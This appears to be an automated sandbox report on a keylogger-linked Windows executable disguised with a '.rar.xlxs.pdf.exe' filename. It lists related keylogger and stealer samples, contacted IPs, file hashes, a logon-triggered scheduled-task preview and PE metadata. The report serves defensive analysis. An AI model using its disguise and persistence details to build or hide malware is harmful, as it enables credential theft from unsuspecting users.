                                                            https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hjGet hashmaliciousUnknownBrowse
                                                            • 162.215.254.118
                                                            http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalari/Get hashmaliciousUnknownBrowse
                                                            • 162.222.225.80
                                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 208.91.199.225
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            54328bd36c14bd82ddaa0c04b25ed9adHesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            dllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            WaUjTT0Wa1.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            3b5074b1b5d032e5620f69f9f700ff0eComprobante.lnk.lnkGet hashmaliciousLokibotBrowse
                                                            • 149.154.167.220
                                                            Comprobante.lnk.lnkGet hashmaliciousLokibotBrowse
                                                            • 149.154.167.220
                                                            08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            sostener.vbsGet hashmaliciousNjratBrowse
                                                            • 149.154.167.220
                                                            sostener.vbsGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            No context
                                                            Process:C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.380805901110357
                                                            Encrypted:false
                                                            SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyuVws:lGLHyIFKL3IZ2KRH9OugbVws
                                                            MD5:18E30393FF7938228743359A706F90CE
                                                            SHA1:D042841E7A99578FB7DF31A21111A90F31287D37
                                                            SHA-256:818419579AF78103C20691E18138F0AD1154BF8356BFABFE5F43C4BADC66C367
                                                            SHA-512:6BFEB58A5CD30CC27A410B292878AF214F711B21141DCCB5225FACC2B0269FFA17701F8878F933132545207FAAD99FB4ED7EC41298C20D474516430528B72B5F
                                                            Malicious:false
                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1600
                                                            Entropy (8bit):5.1177102532808885
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTDv
                                                            MD5:1E8227FB1A4E061E9A8391E71A6D6524
                                                            SHA1:582BF5D2A523BA4B826C8F06447079FFB0F449C1
                                                            SHA-256:22CE99490EE59E4ABD33B67F1AE640ED5C68DE6E93F05E6CE672617614A96089
                                                            SHA-512:B3A173937D2302691BEA4A76EAC0983CFD9FF1BBA784701E926E00992F28DED89BC19D9D3F0D35150839285D2DB5C11D806B90A0F5D858DE218A5FF73936BE97
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                            Process:C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1600
                                                            Entropy (8bit):5.1177102532808885
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTDv
                                                            MD5:1E8227FB1A4E061E9A8391E71A6D6524
                                                            SHA1:582BF5D2A523BA4B826C8F06447079FFB0F449C1
                                                            SHA-256:22CE99490EE59E4ABD33B67F1AE640ED5C68DE6E93F05E6CE672617614A96089
                                                            SHA-512:B3A173937D2302691BEA4A76EAC0983CFD9FF1BBA784701E926E00992F28DED89BC19D9D3F0D35150839285D2DB5C11D806B90A0F5D858DE218A5FF73936BE97
                                                            Malicious:true
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                            Process:C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):884224
                                                            Entropy (8bit):7.580132132175222
                                                            Encrypted:false
                                                            SSDEEP:24576:8v2nCRxi02dgg7EC6rgzJnmMJHxxVUY4:8unCRN2dg6ECIWJnmMJRn0
                                                            MD5:BE92B638000820878C7BE0E70E257C95
                                                            SHA1:AF9706BED063D07C65EAC06773C8E6A1ED2E447A
                                                            SHA-256:407DF9654A54792EE72730F5DAE8BD303D7D92A24A5FE0A5BC83F634BAB7A235
                                                            SHA-512:E9331EE0E8AC8EBA302CE4BDCAD38EFAB115D8117818B1DA0D0E51BB5C3DACBF14E1A415D0D779CE1F4E87EDF74A7369ADF1D72417CB49E3696395D2667B17CC
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!.;...............0..r.............. ........@.. ....................................@.................................}...O.......<............................S..p............................................ ............... ..H............text....q... ...r.................. ..`.rsrc...<............t..............@..@.reloc...............|..............@..B........................H........G..P.......Q...L...@c............................................{....*"..}....*....0...........(....r...po....o....}......}.....(.......(......{....s.......o.....r%..ps.......o......o.......o......,{.+k...o.........J.....J.........,K...(....sR...}.....{....oS.....{.....{....{....rU..p.{....{....( ...o!.......o".......-......,..o#.........,..o#......(.....*......^...........<..........0............{....o$...o%.....{....s.......o.....rY..p.{....|....(&...r...p( .....s
                                                            Process:C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.580132132175222
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            File size:884'224 bytes
                                                            MD5:be92b638000820878c7be0e70e257c95
                                                            SHA1:af9706bed063d07c65eac06773c8e6a1ed2e447a
                                                            SHA256:407df9654a54792ee72730f5dae8bd303d7d92a24a5fe0a5bc83f634bab7a235
                                                            SHA512:e9331ee0e8ac8eba302ce4bdcad38efab115d8117818b1da0d0e51bb5c3dacbf14e1a415d0d779ce1f4e87edf74a7369adf1d72417cb49e3696395d2667b17cc
                                                            SSDEEP:24576:8v2nCRxi02dgg7EC6rgzJnmMJHxxVUY4:8unCRN2dg6ECIWJnmMJRn0
                                                            TLSH:7415ADC076296B09DD7947B09539DEB053B42929B019F6D60CCAFBFB39A87035908F87
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!.;...............0..r............... ........@.. ....................................@................................
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x4d91d2
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xBF3BC221 [Tue Sep 1 20:22:57 2071 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd917d0x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xda0000x63c.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xdc0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xd538c0x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xd71d80xd72009f6208103beb47a81e2af520b8d3afddFalse0.8138266723561882data7.588327362841595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xda0000x63c0x800a1715243dcbdc9684ce1d6594cf85e83False0.3388671875data3.4870763909056315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xdc0000xc0x200317f9eb7156127ef48069947514e32baFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xda0900x3acdata0.41595744680851066
                                                            RT_MANIFEST0xda44c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
